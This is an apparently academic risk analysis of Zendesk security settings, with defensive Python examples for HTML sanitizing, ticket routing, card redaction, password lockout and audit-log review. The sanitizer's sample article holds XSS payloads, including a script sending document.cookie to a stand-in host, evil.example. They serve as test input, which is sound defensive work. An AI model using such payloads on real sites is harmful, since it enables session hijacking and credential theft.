Zendesk Risk Analysis and Recommendations

Abstract

This paper provides an overview of CSM (customer service management) applications, focusing on their security and exposure to risk; it concentrates on Zendesk, a software suite that I just implemented at my organization. As an IT manager, one must carefully select the CSM an organization will use, performing several of the same risk assessments and evaluations discussed in this course. Cloud-based help centers, all-in-one customer communication platforms, and data analytics and sales metrics engines are quickly becoming the norm for businesses, yet the risks that come with adopting such a service too often go unnoticed. This paper intends to provide the reader with an in-depth risk analysis of Zendesk and the methods of minimizing, mitigating, or eliminating the threats identified.

A CSM, or customer service management application, enables an organization to interact with customers over various communication channels, including live chat, email, social media, and VoIP. A CSM also gives employees a more structured way to send files, create internal tickets, schedule meetings, and access information. For many organizations, the CSM sits at the heart of the company, built and maintained to carry all internal and external communications. Securing it is therefore vital to the continued operation of the business and to the confidentiality, integrity, and availability of both its own data and its customers' data.

How should one strengthen the security of Zendesk, the service many organizations use to manage customer interactions, build relationships, increase sales, and let employees create internal tickets? Zendesk can also be run as an online help center (Guide) loaded with self-help articles on topics such as product management, business practices, customer service, and IT. Before diving into Zendesk's security settings, there are a few things to address during the initial setup. The first is the Sandbox feature, a test environment for the future build: the sandbox is a test copy of the account's configuration, so the entire CSM can be built and exercised there (Zendesk, n.d.). Much like staging a change in a virtual machine, one can test triggers, apps, integrations, and access controls (and whatever security testing the vendor permits against a sandbox) and confirm that everything works before going live.

Guide, Zendesk's help center, is an outstanding way to provide self-help to both customers and employees (Zendesk, n.d.). Guide can give employees a way to submit internal tickets, eliminating the need for each of them to hold a Zendesk Support agent seat (a change that can save a company hundreds of dollars a month). Through the uploaded articles, both employees and customers can find answers by searching, or have suggested articles appear as they write a ticket. Because some internal articles are sensitive, one should always verify the protection measures so that customers cannot reach the internal portions of Guide.

The first thing to understand is how the visibility of individual Guide articles can be customized: articles can be limited to agents or managers only, placed in a separate category, assigned a different manager, and restricted to signed-in users. Guide offers extensive spam controls and filters, and Explore, Zendesk's data and analytics tool (useful for all other Zendesk modules as well, such as chat and email), shows who has used the help center recently (Zendesk, n.d.). As with Zendesk's email handling, one can fine-tune user profiles and restrict or grant access by IP address or individual. In most Guide deployments, the option to display unsafe content should be turned off; it controls whether potentially unsafe HTML in article bodies (such as scripts) is rendered to readers, so leaving it off limits what a malicious or compromised author could inject into the help center. Requiring users to sign in to gain access should be combined with it.
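As an added illustration (my own code, not Zendesk's; the tag and attribute allowlist is an assumption about what a self-help article legitimately needs), the following Python sanitizer shows what a "do not display unsafe content" policy has to strip from an article body before rendering: script and frame elements with their contents, event-handler attributes, and javascript: links. The sample article HTML is constructed for the example.

```python
"""Allowlist sanitizer for help-center article HTML.

Added example, not Zendesk code. The allowlist below is an assumption about
what a self-help article legitimately needs; everything else is dropped.
"""
from html import escape
from html.parser import HTMLParser
import re

ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "ul", "ol", "li",
                "a", "code", "pre", "h2", "h3"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
# Only these URL forms survive in href; javascript:, data:, vbscript: do not.
SAFE_URL = re.compile(r"^(https?:|mailto:|/|#)", re.IGNORECASE)
# Content of these elements is dropped entirely, not just the tag.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object"}


class ArticleSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # sanitized fragments
        self.dropped = []    # what was removed, for the admin's report
        self._skip = 0       # >0 while inside script/style/iframe/object

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._skip += 1
            self.dropped.append(tag)
            return
        if self._skip:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            value = (value or "").strip()
            if name.startswith("on"):                 # onclick, onerror, onload ...
                self.dropped.append(f"{tag}@{name}")
            elif name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")
            elif name == "href" and not SAFE_URL.match(value):
                self.dropped.append(f"{tag}@href={value}")
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append("<" + tag + "".join(kept) + ">")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._skip = max(0, self._skip - 1)
            return
        if self._skip or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append("</" + tag + ">")

    def handle_data(self, data):
        if not self._skip:
            # Re-escape text so a stray '<' or '&' cannot open a new tag.
            self.out.append(escape(data, quote=False))


def sanitize_article(body_html):
    """Return (clean_html, dropped_items) for an article body."""
    parser = ArticleSanitizer()
    parser.feed(body_html)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample: a legitimate article with injected script, image-onerror
# and javascript: link payloads of the kind "display unsafe content" would render.
SAMPLE_ARTICLE = (
    '<h2>Reset your password</h2>'
    '<p>Go to <a href="https://example.com/reset" onclick="steal()">the reset page</a>.</p>'
    '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'
    '<img src=x onerror="alert(1)">'
    '<p>Then <a href="javascript:alert(1)">click here</a> &amp; sign in.</p>'
)

if __name__ == "__main__":
    clean, dropped = sanitize_article(SAMPLE_ARTICLE)
    print(clean)
    print("dropped:", dropped)
```

The `dropped` list is worth logging: an article that repeatedly arrives with script tags or event handlers points at a compromised or careless author account, which is a better signal than the sanitized output alone.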

Many who start using Chat, Zendesk's live chat feature, install it on only one of their websites; rolling it out to the rest in stages is recommended so that problems can be solved and settings refined before a full rollout. Securing Chat is similar to the other Zendesk modules: one can require visitors to sign in (through Facebook, Google, or by creating an account), limit access to specific countries or IPs, and disable file uploads. If a company is like most, it will have a seemingly endless number of email addresses to connect; during this process, it needs to enter each address correctly and verify that the connection succeeded. For most Gmail accounts the verification process is simple; however, aliases can quickly run into errors, ranging from SPF failures to DNS misconfiguration.

Zendesk, at the time of writing, does not support Gmail aliases, although a connection can 'somewhat' be created. Before connecting an organization's email accounts, go through all of their settings and run a security check: add or update account recovery options, turn on two-step verification, and set a strong password. Often one will have to go into, for example, the Gmail account itself to add the Zendesk forwarding address. Note that support addresses on the account's own zendesk.com subdomain can also be created to replace those that do not verify correctly, and they are free (Verge, 2020).

Next, Zendesk administrators will want to understand how routing emails with triggers can improve security: by routing on department, brand, recipient address, or parameters like the subject line, one can make sure that sensitive messages (such as a superior's banking information) reach the correct manager and not 'Linda' from customer service. Creating triggers that automatically notify requesters that their ticket was received (for security and accountability), and automations that send alerts based on the organization's or department's SLAs (service-level agreements), is highly recommended. Organizations generally end up with a long list of triggers and automations routing internal and external tickets from their brands and numerous websites; it takes time, but the results speak for themselves (Young, 2020).
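The routing described above, as an added example rather than Zendesk's own trigger engine: a small Python evaluator modelled on the all/any condition blocks and ordered actions of Zendesk triggers. The re-evaluation-after-a-change behaviour, the field names, the group names and the sample tickets are assumptions made for the illustration; the point it shows is that the specific "sensitive financial" rule must sit above the catch-all rules, and that a customer's email mentioning "bank" does not get swept into the finance managers' queue.

```python
"""Ticket routing with trigger-style rules.

Added example, not Zendesk's trigger engine. The all/any condition blocks,
ordered evaluation, and re-running the remaining triggers after one fires are
modelled on how Zendesk triggers behave; the field names, groups, and sample
tickets below are assumptions made for the illustration.
"""
import re
from dataclasses import dataclass, field


@dataclass
class Ticket:
    id: int
    subject: str
    requester_email: str
    brand: str
    group: str = "Unassigned"
    tags: set = field(default_factory=set)
    notified: list = field(default_factory=list)


def condition_matches(ticket, cond):
    """cond is (field, operator, value); operators mirror common trigger conditions."""
    fld, op, value = cond
    actual = str(getattr(ticket, fld))
    if op == "is":
        return actual == value
    if op == "contains":
        return value.lower() in actual.lower()
    if op == "ends_with":
        return actual.lower().endswith(value.lower())
    if op == "matches":                       # regex, for subject-line patterns
        return re.search(value, actual, re.IGNORECASE) is not None
    raise ValueError(f"unknown operator: {op}")


def trigger_fires(ticket, trigger):
    all_ok = all(condition_matches(ticket, c) for c in trigger.get("all", []))
    any_conds = trigger.get("any", [])
    any_ok = not any_conds or any(condition_matches(ticket, c) for c in any_conds)
    return all_ok and any_ok


def apply_actions(ticket, actions):
    for action, value in actions:
        if action == "assign_group":
            ticket.group = value
        elif action == "add_tag":
            ticket.tags.add(value)
        elif action == "notify":              # a real system sends email here
            ticket.notified.append(value)
        else:
            raise ValueError(f"unknown action: {action}")


def run_triggers(ticket, triggers):
    """Evaluate in order; each trigger fires at most once per run, and after any
    trigger changes the ticket the list is re-checked from the top."""
    fired = []
    changed = True
    while changed:
        changed = False
        for trig in triggers:
            if trig["name"] not in fired and trigger_fires(ticket, trig):
                apply_actions(ticket, trig["actions"])
                fired.append(trig["name"])
                changed = True
                break
    return fired


# Order matters: the specific routing rule sits above the catch-all rules.
TRIGGERS = [
    {"name": "Internal banking/payroll to finance manager",
     "all": [("brand", "is", "Internal"),
             ("requester_email", "ends_with", "@example.com")],
     "any": [("subject", "matches", r"\b(bank|banking|payroll|direct deposit|routing number)\b")],
     "actions": [("assign_group", "Finance Managers"), ("add_tag", "sensitive_financial")]},
    {"name": "Internal tickets to IT helpdesk",
     "all": [("brand", "is", "Internal"), ("group", "is", "Unassigned")],
     "actions": [("assign_group", "IT Helpdesk")]},
    {"name": "Customer tickets to support",
     "all": [("brand", "is", "Retail"), ("group", "is", "Unassigned")],
     "actions": [("assign_group", "Customer Service")]},
    {"name": "Acknowledge every ticket",
     "all": [],
     "actions": [("notify", "requester")]},
]


def route(ticket, triggers=TRIGGERS):
    run_triggers(ticket, triggers)
    return ticket


if __name__ == "__main__":
    samples = [
        Ticket(1, "Updated banking details for payroll", "boss@example.com", "Internal"),
        Ticket(2, "VPN not working from home", "staff@example.com", "Internal"),
        Ticket(3, "Bank transfer for order 1001 failed", "shopper@mail.example", "Retail"),
    ]
    for t in samples:
        route(t)
        print(t.id, t.group, sorted(t.tags), t.notified)
```

Swapping the first two triggers would silently break the protection: the helpdesk catch-all would claim the banking ticket first, and the finance rule would never see an unassigned ticket. Reviewing trigger order is therefore part of the security review, not just the workflow review.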

Much like Windows, users have permissions and roles that grant or deny access to specific ticket views, groups, and forms. Following the same sysadmin principle of least privilege, granting users only the access they need, is an excellent idea. Administrators can change account settings, so assign admin privileges sparingly. Now, let us discuss the security settings within Zendesk. Through the security page, one can control access to the mobile app and enable automatic redaction of credit card numbers. The redaction feature is an excellent way to protect customer data; however, it works a little too efficiently: redaction replaces credit card numbers with blank characters before an agent can even see the data, which is secure but causes headaches when a number legitimately needs to be handled.
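To show what automatic credit-card redaction has to do, and why a number an agent expected to see disappears, here is an added Python example (my own code, not Zendesk's implementation): candidate digit runs are validated with the Luhn checksum before masking, so order numbers and phone numbers survive while real card numbers do not. Keeping the last four digits is a choice made for this example, and the sample ticket comment is constructed.

```python
"""Credit-card redaction for ticket text.

Added example, not Zendesk's redaction code. Digit runs of card length are
masked only if they pass the Luhn checksum, so order numbers and phone numbers
are left readable. Keeping the last four digits is a choice made here.
"""
import re

# 13-19 digits, optionally separated by single spaces or hyphens,
# not glued to other digits on either side.
CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits):
    """Luhn checksum as used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_cards(text):
    """Return the card-like numbers in text that pass the Luhn check."""
    found = []
    for m in CANDIDATE.finditer(text):
        digits = re.sub(r"\D", "", m.group(0))
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            found.append(m.group(0))
    return found


def redact_cards(text, keep_last=4, mask="X"):
    """Mask every Luhn-valid card number, preserving separators and the last digits."""
    def _mask(match):
        raw = match.group(0)
        digits = re.sub(r"\D", "", raw)
        if not (13 <= len(digits) <= 19 and luhn_ok(digits)):
            return raw                       # not a card: leave it alone
        out, keep = [], keep_last
        for ch in reversed(raw):             # walk from the end so the tail survives
            if ch.isdigit():
                out.append(ch if keep > 0 else mask)
                keep -= 1
            else:
                out.append(ch)
        return "".join(reversed(out))
    return CANDIDATE.sub(_mask, text)


# Constructed ticket comment: one Visa test number, one Amex test number,
# an order number that looks like a card but fails Luhn, and a phone number.
SAMPLE_COMMENT = ("Please charge 4111 1111 1111 1111 (exp 12/24) or my Amex 378282246310005. "
                  "Order 1234567812345678, call me on 555-123-4567.")

if __name__ == "__main__":
    print(find_cards(SAMPLE_COMMENT))
    print(redact_cards(SAMPLE_COMMENT))
```

The Luhn test is what keeps the rule from firing on every long number in a ticket; without it, a 16-digit order number would be redacted too, which is the kind of headache the paragraph above describes.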

Within the admin section, one can, and should, turn on Zendesk authentication, which requires staff members to sign in with an email and password. Zendesk lets one control the strength of login passwords through password levels (Zendesk, n.d.). If one does not want to get too deep into customization, the 'high' setting requires passwords of at least six characters that include mixed-case letters and numbers, expires them after ninety days, and allows only ten attempts before a lockout, adding protection against brute-force attacks (Avares & Ladd, 2020). A custom password level can be created for extra security, which is thoroughly recommended; six characters is a low bar by today's standards, so a custom level should at least raise the minimum length.
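An added example (my own code, not Zendesk's) of the two password levels just discussed: the 'high' level exactly as the paragraph describes it, and a stricter custom level, with the expiry and lockout rules enforced at login. The custom level's values, the PBKDF2 hashing, the account model and the return codes are assumptions made for the illustration.

```python
"""Password levels, expiry and lockout.

Added example, not Zendesk's code. HIGH mirrors the 'high' level as described
in the text; CUSTOM is an assumed stricter level. The account model, PBKDF2
hashing and return codes are assumptions for the illustration.
"""
import hashlib
import hmac
import os
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class PasswordPolicy:
    min_length: int
    require_mixed_case: bool
    require_digit: bool
    require_symbol: bool
    expire_days: int
    max_attempts: int


HIGH = PasswordPolicy(min_length=6, require_mixed_case=True, require_digit=True,
                      require_symbol=False, expire_days=90, max_attempts=10)
CUSTOM = PasswordPolicy(min_length=12, require_mixed_case=True, require_digit=True,
                        require_symbol=True, expire_days=90, max_attempts=5)

# Fixed clock values so the example is reproducible.
NOW = datetime(2020, 10, 1)
LATER = NOW + timedelta(days=91)          # one day past the 90-day expiry


def check_password(policy, candidate):
    """Return the list of policy rules the candidate violates (empty = acceptable)."""
    problems = []
    if len(candidate) < policy.min_length:
        problems.append(f"at least {policy.min_length} characters")
    if policy.require_mixed_case and not (re.search(r"[a-z]", candidate)
                                          and re.search(r"[A-Z]", candidate)):
        problems.append("upper and lower case letters")
    if policy.require_digit and not re.search(r"\d", candidate):
        problems.append("a digit")
    if policy.require_symbol and not re.search(r"[^A-Za-z0-9]", candidate):
        problems.append("a symbol")
    return problems


class StaffAccount:
    def __init__(self, policy, password, now):
        self.policy = policy
        self.locked = False
        self.failed_attempts = 0
        self.set_password(password, now)

    @staticmethod
    def _hash(password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)

    def set_password(self, password, now):
        problems = check_password(self.policy, password)
        if problems:
            raise ValueError("password needs: " + ", ".join(problems))
        self.salt = os.urandom(16)
        self.digest = self._hash(password, self.salt)
        self.changed_at = now
        self.failed_attempts = 0
        self.locked = False

    def password_expired(self, now):
        return now - self.changed_at > timedelta(days=self.policy.expire_days)

    def login(self, password, now):
        """Return 'ok', 'expired', 'wrong' or 'locked'."""
        if self.locked:
            return "locked"                          # even a correct password is refused
        if hmac.compare_digest(self.digest, self._hash(password, self.salt)):
            self.failed_attempts = 0
            return "expired" if self.password_expired(now) else "ok"
        self.failed_attempts += 1
        if self.failed_attempts >= self.policy.max_attempts:
            self.locked = True
            return "locked"
        return "wrong"


if __name__ == "__main__":
    print(check_password(HIGH, "Passw0rd"), check_password(CUSTOM, "Passw0rd"))
    acct = StaffAccount(HIGH, "Passw0rd", NOW)
    print(acct.login("Passw0rd", NOW), acct.login("Passw0rd", LATER))
    print([acct.login("guess", NOW) for _ in range(HIGH.max_attempts)][-1])
```

Note that "Passw0rd" satisfies the 'high' level and fails the custom one only on length and symbol; the lockout counter, not the complexity rule, is what actually limits an online guessing attack, and the counter resets only on a successful login.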

Next, on the staff member page, administrators will see an external authentication setting that lets employees sign in using external services. Depending on the company's size and the sensitivity of its data, one may want to disable this feature entirely; if it stays on, limit it to a single managed identity provider, such as Google accounts under SSO (single sign-on), and encourage users to sign in that way rather than through several unmanaged options. The settings above apply to both staff and end users, each with a separate page, so end users can be given stricter protection measures than staff, or vice versa.

Under the advanced tab in admin settings, administrators of Zendesk accounts should enable email notifications; they will then receive a message whenever settings are changed within Zendesk, which is a necessity for keeping a top-down view of the system's protection at all times. One can also turn on 2FA (two-factor authentication) for staff members and see which employees have not yet set it up. In the majority of cases, 2FA should be required, and the separate session expiration setting should be kept to a working day or less (eight hours at most), so that an idle session expires when the limit is reached instead of staying open indefinitely. By adding IP address restrictions, one can limit Zendesk usage to specific address ranges, providing a further deterrent against intrusion (Zendesk, 2020).

Finally, most administrators' favorite tool in Zendesk is its built-in audit log (change log). Besides the account owner there can be a few administrators who occasionally make changes; having too many hands in the bowl, or cooks in the kitchen, can lead to disastrous complications if their changes go unnoticed. Scanning the audit log at least daily ensures that no changes were made that the account owner did not approve or know about. Zendesk, or any CSM, opens up a wide range of additional communication tools, abilities, and channels for both internal and external users. Like any application, the way it is built can lead to success or failure, depending on the research and actions one takes to protect information assets (Zendesk, n.d.).
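Daily audit-log review can be scripted. The following added Python example (my own code, not a Zendesk tool) reads entries shaped like an audit-log export and flags changes made by anyone not on the approved administrator list, changes to security-sensitive settings, deletions, and changes made outside office hours. The field names, the source-type labels, the keyword list and the sample entries are assumptions constructed for the example.

```python
"""Daily audit-log review.

Added example, not a Zendesk tool. The entries are shaped like an audit-log
export (id, actor_id, actor_name, action, source_type, source_label,
change_description, ip_address, created_at); those field names, the
source-type labels, the keyword list and the sample data are assumptions.
"""
import json
from datetime import datetime

# Changes to these objects, or whose description mentions these words, get flagged.
SENSITIVE_SOURCES = {"account_setting", "role", "api_token", "oauth_client", "ip_restriction"}
SENSITIVE_WORDS = ("two-factor", "two factor", "password", "sso", "authentication",
                   "ip restriction", "redaction", "api token")


def parse_audit_log(raw_json):
    """Accept the JSON body of an audit-log export and return its entry list."""
    return json.loads(raw_json)["audit_logs"]


def review_audit_log(entries, approved_admins, office_hours=(8, 18)):
    """Return one finding per questionable entry, entries with most reasons first."""
    findings = []
    for e in entries:
        when = datetime.fromisoformat(e["created_at"].replace("Z", "+00:00"))
        desc = e.get("change_description", "").lower()
        reasons = []
        if e["actor_id"] not in approved_admins:
            reasons.append("actor not on the approved administrator list")
        if e["source_type"] in SENSITIVE_SOURCES or any(w in desc for w in SENSITIVE_WORDS):
            reasons.append("security-sensitive setting changed")
        if not office_hours[0] <= when.hour < office_hours[1]:
            reasons.append("change made outside office hours")
        if e["action"] == "destroy":
            reasons.append("object deleted")
        if reasons:
            findings.append({"id": e["id"], "actor": e.get("actor_name", e["actor_id"]),
                             "when": e["created_at"], "ip": e.get("ip_address"),
                             "what": f'{e["action"]} {e["source_type"]} "{e["source_label"]}"',
                             "reasons": reasons})
    findings.sort(key=lambda f: len(f["reasons"]), reverse=True)
    return findings


# Constructed sample export: one routine change and three that should be questioned.
SAMPLE_EXPORT = json.dumps({"audit_logs": [
    {"id": 101, "actor_id": 11, "actor_name": "Owner", "action": "update",
     "source_type": "macro", "source_label": "Close and thank",
     "change_description": "Updated macro actions", "ip_address": "203.0.113.10",
     "created_at": "2020-09-30T10:12:00Z"},
    {"id": 102, "actor_id": 12, "actor_name": "Admin A", "action": "update",
     "source_type": "account_setting", "source_label": "Security settings",
     "change_description": "Two-factor authentication requirement changed from true to false",
     "ip_address": "203.0.113.10", "created_at": "2020-09-30T02:13:00Z"},
    {"id": 103, "actor_id": 900, "actor_name": "Linda", "action": "create",
     "source_type": "api_token", "source_label": "integration token",
     "change_description": "Created API token", "ip_address": "198.51.100.7",
     "created_at": "2020-09-30T11:40:00Z"},
    {"id": 104, "actor_id": 11, "actor_name": "Owner", "action": "destroy",
     "source_type": "trigger", "source_label": "Acknowledge every ticket",
     "change_description": "Deleted trigger", "ip_address": "203.0.113.10",
     "created_at": "2020-09-30T16:05:00Z"},
]})

if __name__ == "__main__":
    for f in review_audit_log(parse_audit_log(SAMPLE_EXPORT), approved_admins={11, 12}):
        print(f["id"], f["actor"], f["what"], "->", "; ".join(f["reasons"]))
```

The approved-administrator list is the control that catches the case the paragraph warns about: an account that was granted admin rights without the owner's knowledge shows up on the first day it makes a change, whatever it changed.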

Regarding privacy, Zendesk's policies cover the Zendesk Developer Portal and Zendesk Marketplace, where many third-party applications are listed; they do not, however, cover third-party websites. Zendesk routinely collects account and registration information, submission data, social media widget information, and data provided by third parties, and it uses cookies. Zendesk uses the data it collects to perform its obligations under its service agreements and to maintain and improve its services. Customer information is often shared with third-party service providers and used for marketing purposes. For international transfers, Zendesk relies on several mechanisms and frameworks, such as safeguards approved by the European Commission (Art. 46 GDPR), the EU-U.S. Privacy Shield Framework, and the Swiss-U.S. Privacy Shield Framework; note that the Court of Justice of the EU invalidated the EU-U.S. Privacy Shield in July 2020 (the Schrems II decision), so the Art. 46 safeguards, such as standard contractual clauses, are the ones an organization should actually rely on.

When it comes to exercising data rights within Zendesk, there are several routes. Ensuring that customer data is correct is vital, and removing any information that is not required is an excellent recommendation. Frequent audits of what data is entered into Zendesk should be performed. Both Zendesk agents and end users can access, update, and delete their personal information. If Zendesk's services are no longer needed, each user profile can be deactivated quickly. Users can also request that Zendesk stop using their personal information and opt out of communications from Zendesk.

Zendesk is a fantastic tool for an organization's communication, both internally and with its customers. As any CSM poses security and privacy challenges because of the vast amount of information it gathers, it is vital to understand Zendesk's many applications and services in their entirety. Only by knowing what needs defending can one effectively reduce risk. Zendesk is a rising star in providing accountability and transparency of employee and customer interactions; however, trusting a vendor with both the company's and its customers' data can be intimidating. One should always research how a CSM vendor accomplishes its often sizable goal of securing personal information, and conduct a risk assessment of its operations, past legal issues, and future expansions.

Annotated Bibliography

Wheeler, E. (2011). Security risk management: Building an information security risk management program from the ground up. Waltham, MA: Syngress.

The fundamental steps this book gives for building an information security risk program provide the foundation of the risk analysis of Zendesk and support the recommendations for minimizing and mitigating any risks found. As risk identification can be challenging and time-consuming, this paper uses the book's approach to limit scope creep by focusing on the primary risks of Zendesk's many products.

Zendesk. (n.d.). Customer service software for the best customer experiences. Retrieved September 30, 2020, from https://www.zendesk.com/support/?variant=231.

Zendesk Support's home page features several articles and documents on Zendesk's products, as well as an overview of what they offer; from this information one can ascertain how the ticketing system, live chat, social messaging, voice chat, help center, AI, forums, and the agent workspace work. The only way to fully understand the risks of a product and increase its security is to thoroughly learn the product and its many variations and connected services.

Zendesk. (n.d.). Secure Customer Service with Zendesk Security. Retrieved September 30, 2020, from https://www.zendesk.com/product/zendesk-security/.

Zendesk provides a general overview of its security practices on this page, focusing on how it protects data, audits its systems, and ensures confidence in its handling of sensitive data. Furthermore, the page covers its compliance certifications and memberships, NDA resources, and cloud application, product, and human resources security. From this page, one can learn how Zendesk secures its data, what risks are present, and how to strengthen its products.

Young, A. (2020, September 25). Security best practices. Retrieved September 30, 2020, from https://support.zendesk.com/hc/en-us/articles/203663716-Security-best-practices.

As Zendesk includes several different products and systems, knowing what Zendesk recommends for security best practices is the first step in analyzing their risks and adapting each layer of protection to the specific situation. The article covers password security and recommended password policies, administrator guidelines, auditing suggestions, single sign-on authentication, IP restrictions, custom API tips, and safe credit card and sensitive information handling. The abovementioned lessons will provide an in-depth view of Zendesk’s protective measures.

Zendesk. (2020, June 2). Privacy and Data Protection. Retrieved September 30, 2020, from https://www.zendesk.com/company/privacy-and-data-protection/.

As Zendesk deals primarily with handling an organization’s customer data, their privacy and data protection rules and regulations are vital in ensuring trust. This article covers how Zendesk manages, hosts, and accesses their (and their customer’s) data, how data is stored, who owns the data at various points in its life cycle, and includes several articles on data processing agreements, binding corporate rules, and privacy shields. This article’s information will assist in analyzing what Zendesk does correctly and what needs additional work regarding their susceptibility to risk.

NCSC. (n.d.). Zendesk security review. Retrieved September 30, 2020, from https://www.ncsc.gov.uk/collection/saas-security/product-evaluations/zendesk.

This article from the National Cyber Security Centre is a security review of Zendesk; it covers the encryption Zendesk uses as a SaaS provider and analyzes several of its business practices. The article provides a basis to build on when answering several of the open questions about Zendesk's cloud services. The report includes data regarding Zendesk's use of HTTPS, TLS, APIs, 2FA, and its SIEM system.

Zendesk. (n.d.). Advanced security addon additional features. Retrieved September 30, 2020, from https://www.zendesk.com/th/company/advanced-security-add-additional-features/.

As Zendesk offers an extensive library of products, deciphering the legal requirements of each can be challenging; thankfully, this website covers how they ensure their compliance with legal requirements. Included in the information are Zendesk’s legal policies and procedures for customers, partners, purchasers, and suppliers. Additionally, risk management, security policies, information security organization, asset management, and human resources are discussed.

Nadeau, C. (n.d.). Complying with Privacy and Data Protection Law in Zendesk products. Retrieved September 30, 2020, from https://support.zendesk.com/hc/en-us/articles/360022366953-Complying-with-Privacy-and-Data-Protection-Law-in-Zendesk-products.

This article expands on Zendesk’s compliance with privacy and data protection laws on each of their numerous products. Included in the report is Zendesk’s compliance with Zendesk Support, Insights, Guide, Chat, Chat accounts, Talk, Explore, Connect, Sell, and Sunshine. Furthermore, the article defines their definition of personal data, soft delete, hard delete, permanent delete, and a scrub. Armed with this article’s information, one can build their knowledge of Zendesk’s many tools and explain risk analysis in their words.

Avares, M., & Ladd, V. (2020). Converging data privacy and security. ISSA Journal, 18(8), 26-30. Retrieved October 1, 2020, from https://search-ebscohost-com.ezproxy.bellevue.edu/login.aspx?direct=true&db=tsh&AN=144915588&site=eds-live.

This journal article touches on the past, current, and future states of data privacy and protection and how they impact risk. By including detailed steps for assessing risk, it assists in the risk analysis of Zendesk's products and in creating recommendations for mitigating or minimizing risk. Finally, its structured approach for bridging security and data privacy offers a clear path to this paper's goals.

Verge, D. (2020). It's 10 o'clock, do you know where your data is? Using data mapping to comply with privacy and security requirements. New Hampshire Business Review, 42(5), 22-23. Retrieved October 1, 2020, from https://search-ebscohost-com.ezproxy.bellevue.edu/login.aspx?direct=true&db=b9h&AN=142312240&site=eds-live.

This article explores data mapping and how it is used to comply with privacy and security requirements. As the science and policies of data security and privacy seem to change every day, this article provides the basis for the requirements placed on organizations that handle customer information. As Zendesk stores and processes a vast amount of personal information, including credit card numbers, addresses, emails, and phone numbers, one needs to map this data and locate possible weak points in its defenses, thus minimizing risk.
